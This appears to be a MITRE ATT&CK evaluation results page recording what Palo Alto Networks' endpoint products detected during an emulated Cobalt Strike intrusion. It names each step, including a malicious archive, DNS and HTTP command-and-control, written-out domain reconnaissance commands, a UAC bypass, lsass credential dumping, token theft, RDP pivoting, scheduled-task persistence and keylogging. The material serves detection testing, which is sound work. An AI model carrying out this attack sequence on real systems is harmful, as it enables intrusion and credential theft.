Palo Alto Networks: XDR, Traps, WildFire

Palo Alto Networks Overview: Tactic Page Information

The ATT&CK tactic page displays all tested techniques belonging to that tactic, as well as all procedures and their respective detections. The procedures are grouped by their technique. The Procedure column contains a description of how the technique was tested. The Step column indicates where in the operational flow the procedure occurred; click the Step Number to view it in the Operational Flow panel. Detections are classified by one or more Detection Types, summarized by the Detection Notes, and may be supported by Screenshots. The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques, and procedures of the executed steps.

MITRE does not assign scores, rankings, or ratings. The evaluation results are available to the public, so other organizations may provide their own analysis and interpretation; these are not endorsed or validated by MITRE.

Legend

Main Detection Categories: None, Telemetry, Indicator of Compromise, General Behavior, Specific Behavior, Enrichment
Detection Modifiers: Tainted, Delayed, Configuration Change

Results (columns: Step, Procedures, Technique, Detection Type, Detection Notes, Screenshots)

Step 1.A.1: Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)
  Technique: User Execution (T1204)
    Telemetry: Telemetry showed that Resume Viewer.exe was executed and running as a process owned by user Debbie.
    Screenshots:
      - Telemetry showing Resume Viewer.exe running as a process
  Technique: Rundll32 (T1085)
    Telemetry (Tainted): Telemetry showed rundll32.exe executing update.dat with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Specific Behavior (Tainted): Specific Behavior alerts were generated for rundll32. The alerts were tagged with the correct ATT&CK Technique (Rundll32) and were tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    General Behavior (Tainted): A General Behavior alert was generated based on rundll32.exe executing update.dat, identified as a suspicious DLL and malware. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. Vendor stated the capability would have prevented execution of update.dat.
    Screenshots:
      - Telemetry showing rundll32.exe executing update.dat (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Specific Behavior alerts for rundll32 tagged with the correct ATT&CK Technique (Rundll32) (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - General Behavior alert for rundll32.exe executing update.dat, identified as a suspicious DLL and malware (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Additional details of General Behavior alert for rundll32.exe executing update.dat
  Technique: Scripting (T1064)
    Telemetry: Telemetry showed cmd.exe launching pdfhelper.cmd.
    Specific Behavior: A Specific Behavior alert was generated for execution of the Windows script engine. The alert was tagged with the correct ATT&CK Technique (Scripting).
    Screenshots:
      - Telemetry showing cmd.exe launching pdfhelper.cmd
      - Specific Behavior alert for execution of Windows script engine tagged with the correct ATT&CK Technique (Scripting)

Step 1.B.1: Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder
  Technique: Registry Run Keys / Startup Folder (T1060)
    Telemetry (Tainted): Telemetry showed autoupdate.bat being moved to the user Debbie's Startup folder. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Enrichment (Configuration Change, Tainted): The capability enriched a file being created in the Startup folder with the correct ATT&CK Technique (Registry Run Keys / Start Folder). The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The logic to produce the enrichment was configured after the start of the evaluation, so it is identified as a configuration change.
    Screenshots:
      - Telemetry showing autoupdate.bat being moved to the user Debbie's Startup folder (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Enrichment of a file being created in the Startup folder tagged with the correct ATT&CK Technique (Registry Run Keys / Start Folder) (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)

Step 1.C.1: Cobalt Strike: C2 channel established
  Technique: Commonly Used Port (T1043)
    Telemetry (Tainted): Telemetry showed port 53 command and control traffic. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. Vendor stated that more information would be available if their firewall appliance was installed and activated.
    Specific Behavior (Tainted): A Specific Behavior alert was generated for a scripting engine (rundll32.exe) making a network connection over DNS ports. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Screenshots:
      - Telemetry showing port 53 command and control traffic (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Specific Behavior alert for a scripting engine (rundll32.exe) making a network connection over DNS ports (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
  Technique: Data Encoding (T1132)
    None: No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated.
  Technique: Standard Application Layer Protocol (T1071)
    None: No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated.

Step 2.A.1: Cobalt Strike: 'ipconfig /all' via cmd
  Technique: System Network Configuration Discovery (T1016)
    Telemetry (Tainted): Telemetry showed cmd.exe executing ipconfig with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Enrichment: The capability enriched ipconfig.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery).
    Enrichment (Tainted): The capability enriched the execution of ipconfig.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    General Behavior (Tainted): A General Behavior alert was generated for a commonly abused process (cmd.exe) spawning out of rundll32.exe. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Screenshots:
      - Telemetry showing cmd.exe executing ipconfig with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Enrichment of ipconfig.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery)
      - Enrichment of the execution of ipconfig.exe as the execution of an enumeration command (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - General Behavior alert for a commonly abused process (cmd.exe) spawning out of rundll32.exe (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)

Step 2.A.2: Cobalt Strike: 'arp -a' via cmd
  Technique: System Network Configuration Discovery (T1016)
    Telemetry (Tainted): Telemetry showed cmd.exe executing arp with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Enrichment: The capability enriched arp.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery).
    Enrichment (Tainted): The capability enriched the execution of arp.exe as possible reconnaissance as well as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Screenshots:
      - Telemetry showing cmd.exe executing arp with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Enrichment of arp.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery)
      - Enrichment of the execution of arp.exe as possible reconnaissance (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Enrichment of the execution of arp.exe as the execution of an enumeration command (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)

Step 2.B.1: Cobalt Strike: 'echo' via cmd to enumerate specific environment variables
  Technique: System Owner / User Discovery (T1033)
    Telemetry (Tainted): Telemetry showed cmd.exe executing echo with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Enrichment: The capability enriched cmd.exe executing echo with the correct ATT&CK Technique (System Owner / User Discovery).
    Screenshots:
      - Telemetry showing cmd.exe executing echo with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Enrichment of cmd.exe executing echo with the correct ATT&CK Technique (System Owner / User Discovery)

Step 2.C.1: Cobalt Strike: 'ps' (Process status) via Win32 APIs
  Technique: Process Discovery (T1057)
    Enrichment (Tainted): The capability enriched the execution of a specific API call as process enumeration and suspicious activity. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
    Screenshots:
      - Enrichment of the execution of a specific API call as process enumeration and suspicious activity (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)

Step 2.C.2: Cobalt Strike: 'tasklist /v' via cmd
  Technique: Process Discovery (T1057)
    Telemetry (Tainted): Telemetry showed cmd.exe executing tasklist with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Enrichment: The capability enriched tasklist.exe executing with a related ATT&CK Technique (System Information Discovery).
    Enrichment (Tainted): The capability enriched the execution of tasklist.exe as the enumeration of running processes via the command line. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Screenshots:
      - Telemetry showing cmd.exe executing tasklist with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Enrichment of tasklist.exe executing with a related ATT&CK Technique (System Information Discovery)
      - Enrichment of the execution of tasklist.exe as the enumeration of running processes via the command line (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)

Step 2.D.1: Cobalt Strike: 'sc query' via cmd
  Technique: System Service Discovery (T1007)
    Telemetry (Tainted): Telemetry showed cmd.exe executing sc with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Screenshots:
      - Telemetry showing cmd.exe executing sc with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)

Step 2.D.2: Cobalt Strike: 'net start' via cmd
  Technique: System Service Discovery (T1007)
    Telemetry (Tainted): Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Enrichment (Tainted): The capability enriched the execution of net.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Screenshots:
      - Telemetry showing cmd.exe executing net with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Enrichment of the execution of net.exe as the execution of an enumeration command (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)

Step 2.E.1: Cobalt Strike: 'systeminfo' via cmd
  Technique: System Information Discovery (T1082)
    Telemetry (Tainted): Telemetry showed cmd.exe executing systeminfo with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Enrichment: The capability enriched cmd.exe executing systeminfo with the correct ATT&CK Technique (System Information Discovery).
    Enrichment (Tainted): The capability enriched the execution of systeminfo.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Screenshots:
      - Telemetry showing cmd.exe executing systeminfo with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Enrichment of cmd.exe executing systeminfo with the correct ATT&CK Technique (System Information Discovery)
      - Enrichment of the execution of systeminfo.exe as the execution of an enumeration command (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)

Step 2.E.2: Cobalt Strike: 'net config workstation' via cmd
  Technique: System Information Discovery (T1082)
    Telemetry (Tainted): Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Enrichment: The capability enriched cmd.exe executing net with the correct ATT&CK Technique (System Information Discovery).
    Enrichment (Tainted): The capability enriched the execution of net.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Screenshots:
      - Telemetry showing cmd.exe executing net with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Enrichment of cmd.exe executing net with the correct ATT&CK Technique (System Information Discovery)
      - Enrichment of the execution of net.exe as the execution of an enumeration command (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)

Step 2.F.1: Cobalt Strike: 'net localgroup administrators' via cmd
  Technique: Permission Groups Discovery (T1069)
    Enrichment: The capability enriched net.exe executing with the correct ATT&CK Technique (Permission Groups Discovery).
    Screenshots:
      - Enrichment of net.exe executing with the correct ATT&CK Technique (Permission Groups Discovery)

Step 2.F.2: Cobalt Strike: 'net localgroup administrators /domain' via cmd
  Technique: Permission Groups Discovery (T1069)
    Enrichment: The capability enriched net.exe executing with the correct ATT&CK Technique (Permission Groups Discovery).
    Screenshots:
      - Enrichment of net.exe executing with the correct ATT&CK Technique (Permission Groups Discovery)

Step 2.F.3: Cobalt Strike: 'net group "Domain Admins" /domain' via cmd
  Technique: Permission Groups Discovery (T1069)
    Telemetry (Tainted): Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Enrichment (Tainted): The capability enriched the execution of net.exe and net1.exe as the possible enumeration of administrator groups. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Enrichment (Tainted): The capability enriched the execution of net.exe as the execution of an enumeration command, as well as the execution of net1.exe as the execution of an enumeration command using net or net1. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Screenshots:
      - Telemetry showing cmd.exe executing net with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Enrichment of the execution of net.exe as the possible enumeration of administrator groups (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Enrichment of the execution of net1.exe as the possible enumeration of administrator groups (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Enrichment of the execution of net.exe as the execution of an enumeration command (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Enrichment of the execution of net.exe as the execution of an enumeration command using net or net1 (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)

Step 2.G.1: Cobalt Strike: 'net user /domain' via cmd
  Technique: Account Discovery (T1087)
    Telemetry (Tainted): Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Enrichment (Tainted): The capability enriched the execution of net.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Screenshots:
      - Telemetry showing cmd.exe executing net with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Enrichment of the execution of net.exe as the execution of an enumeration command (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)

Step 2.G.2: Cobalt Strike: 'net user george /domain' via cmd
  Technique: Account Discovery (T1087)
    Telemetry (Tainted): Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Enrichment: The capability enriched net1.exe executing with the correct ATT&CK Technique (Account Discovery).
    Enrichment (Tainted): The capability enriched the execution of net.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Screenshots:
      - Telemetry showing cmd.exe executing net with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Enrichment of net1.exe executing with the correct ATT&CK Technique (Account Discovery)
      - Enrichment of the execution of net.exe as the execution of an enumeration command (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)

Step 2.H.1: Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key
  Technique: Query Registry (T1012)
    Telemetry (Tainted): Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
    Enrichment: The capability enriched reg.exe executing with the correct ATT&CK Technique (Query Registry).
    Screenshots:
      - Telemetry showing cmd.exe executing reg with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
      - Enrichment of reg.exe executing with the correct ATT&CK Technique (Query Registry)

Step 3.A.1: Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level
  Technique: Access Token Manipulation (T1134)
    Telemetry: Telemetry showed svchost.exe executed with the seclogon command-line argument and a subsequent logon event with an elevated token and new logon ID, indicating token manipulation.
    Screenshots:
      - Telemetry showing svchost.exe executed with the seclogon command-line argument
      - Telemetry showing logon event with an elevated token and new logon ID
  Technique: Bypass User Account Control (T1088)
    Telemetry: Telemetry showed a process integrity level change from parent rundll32.exe (medium / 8192) to child powershell.exe (high / 12288), both running as user Debbie.
    Screenshots:
      - Telemetry showing process integrity level change from parent rundll32.exe (medium) to child powershell.exe (high), both running as user Debbie

Step 3.B.1: Cobalt Strike: 'ps' (Process status) via Win32 APIs
  Technique: Process Discovery (T1057)
    Enrichment (Tainted): The capability enriched the execution of a specific API call as process enumeration and suspicious activity. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
    Screenshots:
      - Enrichment of the execution of a specific API call as process enumeration and suspicious activity (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)

Step 3.C.1: Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe
  Technique: Process Injection (T1055)
    Specific Behavior (Tainted): A Specific Behavior alert was generated for PowerShell injecting shellcode. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
    Screenshots:
      - Specific Behavior alert for PowerShell injecting shellcode (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)

Step 4.A.1: Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd
  Technique: Remote System Discovery (T1018)
    Telemetry: Telemetry showed cmd.exe executing net with command-line arguments.
    Enrichment: The capability enriched the execution of net.exe as the execution of an enumeration command using net or net1.
    Enrichment: The capability enriched the execution of net.exe as the execution of an enumeration command.
    Enrichment: The capability enriched cmd.exe executing net with a related ATT&CK Technique (System Network Connections Discovery).
    Screenshots:
      - Telemetry showing cmd.exe executing net with command-line arguments
      - Enrichment of the execution of net.exe as the execution of an enumeration command using net or net1
      - Enrichment of the execution of net.exe as the execution of an enumeration command
      - Enrichment of cmd.exe executing net with a related ATT&CK Technique (System Network Connections Discovery)

Step 4.A.2: Cobalt Strike: 'net group "Domain Computers" /domain' via cmd
  Technique: Remote System Discovery (T1018)
    Telemetry: Telemetry showed cmd.exe executing net with command-line arguments.
    Enrichment: The capability enriched the execution of net.exe as the execution of an enumeration command using net or net1.
    Screenshots:
      - Telemetry showing cmd.exe executing net with command-line arguments
      - Enrichment of the execution of net.exe as the execution of an enumeration command using net or net1

Step 4.B.1: Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd
  Technique: System Network Configuration Discovery (T1016)
    Telemetry: Telemetry showed cmd.exe executing netsh with command-line arguments.
    Enrichment: The capability enriched netsh.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery).
    Screenshots:
      - Telemetry showing cmd.exe executing netsh with command-line arguments
      - Enrichment of netsh.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery)

Step 4.C.1: Cobalt Strike: 'netstat -ano' via cmd
  Technique: System Network Connections Discovery (T1049)
    Telemetry: Telemetry showed cmd.exe executing netstat with command-line arguments.
    Enrichment: The capability enriched netstat.exe executing with the correct ATT&CK Technique (System Network Connections Discovery).
    Screenshots:
      - Telemetry showing cmd.exe executing netstat with command-line arguments
      - Enrichment of netstat.exe executing with the correct ATT&CK Technique (System Network Connections Discovery)

Step 5.A.1: Cobalt Strike: Built-in Mimikatz credential dump capability executed
  Technique: Credential Dumping (T1003)
    Specific Behavior: A Specific Behavior alert was generated for a suspicious handle being opened to lsass.exe to dump passwords. The alert was tagged with the correct ATT&CK Technique (Credential Dumping). Vendor stated the capability would have prevented this behavior.
    Screenshots:
      - Specific Behavior alert for a suspicious handle being opened to lsass.exe to dump passwords, tagged with the correct ATT&CK Technique (Credential Dumping)
  Technique: Process Injection (T1055)
    Specific Behavior: A Specific Behavior alert was generated for a suspicious handle being opened to lsass.exe. The alert was tagged with a related ATT&CK Technique (Credential Dumping). Vendor stated the capability would have prevented this behavior.
    Screenshots:
      - Specific Behavior alert for a suspicious handle being opened to lsass.exe, tagged with a related ATT&CK Technique (Credential Dumping)

Step 5.A.2: Cobalt Strike: Built-in hash dump capability executed
  Technique: Credential Dumping (T1003)
    Telemetry (Tainted): Telemetry showed a code injection into lsass.exe. The telemetry was tainted by a parent process injection alert on cmd.exe.
    Specific Behavior: A Specific Behavior alert was generated for svchost dumping credentials via the Registry. The alert was tagged with the correct ATT&CK Technique (Credential Dumping).
    Screenshots:
      - Telemetry showing a code injection into lsass.exe (tainted by a parent process injection alert on cmd.exe)
      - Specific Behavior alert for svchost dumping credentials via the Registry tagged with the correct ATT&CK Technique (Credential Dumping)
  Technique: Process Injection (T1055)
    Telemetry (Tainted): Telemetry showed a code injection into lsass.exe. The telemetry was tainted by a parent process injection alert on cmd.exe.
    Screenshots:
      - Telemetry showing a code injection into lsass.exe (tainted by a parent process injection alert on cmd.exe)

Step 5.B.1: Cobalt Strike: Built-in token theft capability executed to change user context to George
  Technique: Access Token Manipulation (T1134)
    Telemetry (Tainted): Telemetry showed a cmd.exe associated with user Debbie spawn a cmd.exe associated with user George, indicating user context change via token manipulation. The telemetry was tainted by a parent process injection alert on cmd.exe.
    Screenshots:
      - Telemetry showing a cmd.exe associated with user Debbie spawn a cmd.exe associated with user George, indicating user context change via token manipulation (tainted by a parent process injection alert on cmd.exe)

Step 6.A.1: Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)
  Technique: Query Registry (T1012)
    Telemetry (Tainted): Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by a parent process injection alert on cmd.exe.
    Enrichment (Tainted): The capability enriched the execution of reg.exe as querying a remote key. The data was tainted by a parent process injection alert on cmd.exe.
    Enrichment: The capability enriched reg.exe executing with the correct ATT&CK Technique (Query Registry).
    Screenshots:
      - Telemetry showing cmd.exe executing reg with command-line arguments (tainted by a parent process injection alert on cmd.exe)
      - Enrichment of the execution of reg.exe as querying a remote key (tainted by a parent process injection alert on cmd.exe)
      - Enrichment of reg.exe executing with the correct ATT&CK Technique (Query Registry)

Step 6.B.1: Cobalt Strike: C2 channel modified
  Technique: Commonly Used Port (T1043)
    Telemetry: Telemetry showed port 80 command and control traffic. Vendor stated that more information would be available if their firewall appliance was installed and activated.
    Screenshots:
      - Telemetry showing port 80 command and control traffic
  Technique: Multiband Communication (T1026)
    Telemetry: Telemetry showed command and control traffic for both ports 80 and 53.
    Screenshots:
      - Telemetry showing ports 80 and 53 command and control traffic
  Technique: Standard Application Layer Protocol (T1071)
    Telemetry: Telemetry showed port 80 command and control traffic as well as the loading of winhttp.dll, which an analyst could use to determine that HTTP was used.
    Screenshots:
      - Telemetry showing port 80 command and control traffic as well as the loading of winhttp.dll

Step 6.C.1: Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)
  Technique: Remote Desktop Protocol (T1076)
    Telemetry (Tainted): Telemetry showed cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker). The telemetry was tainted by a parent process injection alert on cmd.exe.
    General Behavior (Tainted): A General Behavior alert was generated for an unexpected process using the RDP port. The alert was tainted by a parent process injection alert on cmd.exe.
    Screenshots:
      - Telemetry showing cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker) (tainted by a parent process injection alert on cmd.exe)
      - General Behavior alert for an unexpected process using the RDP port (tainted by a parent process injection alert on cmd.exe)

Step 7.A.1: Added user Jesse to Conficker (10.0.0.5) through RDP connection
  Technique: Create Account (T1136)
    Telemetry: Telemetry showed mmc.exe creating a Registry key for user Jesse, indicating that the user is new.
    Enrichment: The capability enriched the Local Users and Groups snap-in (lusrmgr.msc) executing with the correct ATT&CK Technique (Create Account).
    Screenshots:
      - Telemetry showing mmc.exe creating a Registry key for user Jesse
      - Enrichment of the Local Users and Groups snap-in (lusrmgr.msc) executing with the correct ATT&CK Technique (Create Account)
  Technique: Graphical User Interface (T1061)
    Telemetry: Telemetry showed mmc.exe, the Microsoft Management Console, executing lusrmgr.msc (the Local Users and Groups snap-in), which displays local account information.
    Enrichment: The capability enriched the Local Users and Groups snap-in (lusrmgr.msc) executing with the correct ATT&CK Technique (Graphical User Interface).
    Screenshots:
      - Telemetry showing lusrmgr.msc running from mmc.exe
      - Enrichment of the Local Users and Groups snap-in (lusrmgr.msc) executing with the correct ATT&CK Technique (Graphical User Interface)
  Technique: Account Discovery (T1087)
    Telemetry: Telemetry showed mmc.exe, the Microsoft Management Console, executing the GUI-based lusrmgr.msc (Local Users and Groups snap-in).
    Enrichment: The capability enriched mmc.exe, the Microsoft Management Console, executing the GUI-based lusrmgr.msc (Local Users and Groups snap-in) as reconnaissance via the MMC utility with the Local Users and Groups view.
    Screenshots:
      - Telemetry showing lusrmgr.msc running from mmc.exe
      - Enrichment of mmc.exe as reconnaissance via the MMC utility with the Local Users and Groups view

7.B.1
Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)
Remote File Copy
(T1105)
Telemetry
Telemetry showed the file create event for updater.dll.
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a script engine creating/writing a DLL in the system32 folder. The alert was tainted by a parent process injection alert on cmd.exe.
Specific Behavior
A Specific Behavior alert was generated for a Windows scripting engine creating an executable on disk.
Telemetry showed the file create event for updater.dll
Specific Behavior alert for a script engine creating/writing a DLL in the system32 folder (tainted by a parent process injection alert on cmd.exe)
Specific Behavior alert for a Windows scripting engine creating an executable on disk
7.C.1
Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)
Scheduled Task
(T1053)
Telemetry (Tainted)
Telemetry showed schtasks.exe creating the Resume Viewer Update Checker scheduled task as reboot persistence and as SYSTEM. The telemetry was tainted by a parent process injection alert on cmd.exe.
Specific Behavior (Tainted)
A Specific Behavior alert was generated for the creation of a new scheduled task. The alert was tainted by a parent process injection alert on cmd.exe. Vendor stated the capability would have prevented the creation of the scheduled task.
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a commonly abused host process scheduling a task. The alert was tainted by a parent process injection alert on cmd.exe. Vendor stated the capability would have prevented the creation of the scheduled task.
Enrichment
The capability enriched schtasks.exe creating the Resume Viewer Update Checker scheduled task with the correct ATT&CK Technique (Scheduled Task).
Telemetry showing schtasks.exe creating the scheduled task (tainted by a parent process injection alert on cmd.exe)
Specific Behavior alert for the creation of a new scheduled task (tainted by a parent process injection alert on cmd.exe)
Specific Behavior alert for a commonly abused host process scheduling a task (tainted by a parent process injection alert on cmd.exe)
Enrichment of schtasks.exe creating the Resume Viewer Update Checker scheduled task with the correct ATT&CK Technique (Scheduled Task)
8.A.1
Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd
File and Directory Discovery
(T1083)
Telemetry (Tainted)
Telemetry showed cmd.exe executing dir with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment (Tainted)
The capability enriched cmd.exe executing dir with command-line arguments as the execution of the dir command on a network location. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment
A General Behavior alert was generated for a commonly abused process (cmd.exe) spawning out of rundll32.exe. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Telemetry showed cmd.exe executing dir with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of cmd executing dir with command-line arguments as the execution of the dir command on a network location (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of cmd.exe executing dir with command-line arguments with the correct ATT&CK Technique (File and Directory Discovery)
8.A.2
Cobalt Strike: 'tree "C:\Users\debbie"' via cmd
File and Directory Discovery
(T1083)
Telemetry (Tainted)
Telemetry showed cmd.exe executing tree with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment
The capability enriched cmd.exe executing tree with command-line arguments with the correct ATT&CK Technique (File and Directory Discovery).
Telemetry showed cmd.exe executing tree with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of cmd.exe executing tree with command-line arguments with the correct ATT&CK Technique (File and Directory Discovery)
8.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
Enrichment (Tainted)
The capability enriched the execution of a specific API call as process enumeration and suspicious activity. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The process tree showing the source of the taint is visible within the same UI but did not fit within the current frame.
Enrichment of the execution of a specific API call as process enumeration and suspicious activity (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
8.C.1
Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie
Input Capture
(T1056)
Enrichment
The capability enriched the execution of a specific API call as keylogging and suspicious activity. Though it does not count as a detection, the capability also showed code and hook injections into explorer.exe.
Enrichment of the execution of a specific API call as keylogging and suspicious activity
Telemetry showing code injection into explorer.exe (does not count as a detection)
